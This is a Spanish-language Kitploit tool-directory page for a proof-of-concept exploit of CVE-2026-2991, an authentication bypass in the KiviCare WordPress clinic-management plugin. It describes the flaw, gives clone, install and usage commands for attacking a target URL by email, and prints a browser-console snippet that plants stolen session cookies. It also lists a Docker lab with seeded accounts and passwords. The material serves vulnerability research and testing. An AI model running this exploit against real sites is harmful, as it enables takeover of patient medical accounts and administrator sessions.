Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-2991 — Exploit PoC para CVE-2026-2991 — bypass de autenticación en el plugin KiviCare de WordPress (≤4.1.2) que permite la toma de control de cuentas de pacientes sin autenticación y la extracción de sesiones de administrador. | Kitploit
Herramientas/GitHubGitHub/joshuavanderpoll/cve-2026-2991
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

Exploit PoC para CVE-2026-2991 — bypass de autenticación en el plugin KiviCare de WordPress (≤4.1.2) que permite la toma de control de cuentas de pacientes sin autenticación y la extracción de sesiones de administrador.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
26hace 5 mesesAún no revisado

KiviCare <= 4.1.2 - Bypass de autenticación (CVE-2026-2991) PoC

Python

📜 Descripción

CVE-2026-2991 es una vulnerabilidad de bypass de autenticación en el plugin de WordPress KiviCare – Clinic & Patient Management System (EHR) que afecta a todas las versiones hasta la 4.1.2 inclusive.

El plugin expone un endpoint REST público en /wp-json/kivicare/v1/auth/patient/social-login que autentica a los usuarios mediante el inicio de sesión social. La función patientSocialLogin() acepta una dirección de correo electrónico y un token de acceso, pero nunca valida el token contra el proveedor social declarado. Cualquier atacante no autenticado puede iniciar sesión como cualquier paciente registrado proporcionando únicamente su correo electrónico y una cadena arbitraria como token.

Adicionalmente, las cookies de autenticación de WordPress se emiten antes de que se aplique la comprobación del rol de paciente. Esto significa que, para cuentas que no son de pacientes (incluidos los administradores), la respuesta devuelve HTTP 403 pero aún incluye cabeceras Set-Cookie válidas, lo que filtra una sesión de administrador reproducible al atacante.

Versiones afectadas: kivicare-clinic-management-system <= 4.1.2

✨ Características

  • Sin autenticación — No se requieren credenciales ni sesión previa
  • Toma de control de cuentas de paciente — Inicia sesión como cualquier paciente registrado usando solo su correo electrónico
  • Fuga de sesión de administrador — Extrae cookies de autenticación de administrador válidas de la respuesta 403 para cuentas que no son de pacientes
  • Fragmento para consola del navegador — Genera JavaScript listo para pegar que inyecta las cookies y redirige directamente al panel de control

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Uso

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

Toma de control de cuenta de paciente

Omite la autenticación de un paciente registrado. El script devuelve su sesión completa, incluido un nonce y cookies reproducibles.

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Bypass de paciente


Fuga de sesión de administrador (cuenta que no es de paciente)

Proporciona el correo electrónico de cualquier usuario que no sea paciente (p. ej., un administrador). El endpoint emite cookies de autenticación válidas antes de la comprobación del rol y devuelve 403 — esas cookies se extraen y se imprimen.

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Fuga de cookies de administrador


Inicio de sesión desde la consola del navegador

Tras una ejecución exitosa, el script imprime un fragmento de JavaScript. Abre el sitio objetivo en tu navegador, pega el fragmento en la consola del navegador (F12 → Console) y pulsa Enter; este establece las cookies robadas y te lleva automáticamente al panel de control.

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 PoC con Docker

Un entorno Docker Compose autónomo con el plugin vulnerable preinstalado y precargado con datos de prueba realistas. Consulta DOCKER.md para más detalles.

root@kitploit:~
cd docker/
docker compose up

El laboratorio precarga las siguientes cuentas en el primer arranque:

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 Referencias

  • KiviCare — Plugin de WordPress
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.

Descargar herramienta
RolUsernameEmailPassword
Administradoradmin[email protected]admin
Médicodr.harris[email protected]Doctor@123
Médicodr.chen[email protected]Doctor@123
Médicodr.okonkwo[email protected]Doctor@123
Pacientejames.ford[email protected]Patient@123
Pacientesofia.reyes[email protected]Patient@123
Pacienteoliver.knight[email protected]Patient@123
Pacienteamara.diallo[email protected]Patient@123
Pacientedan.walsh[email protected]Patient@123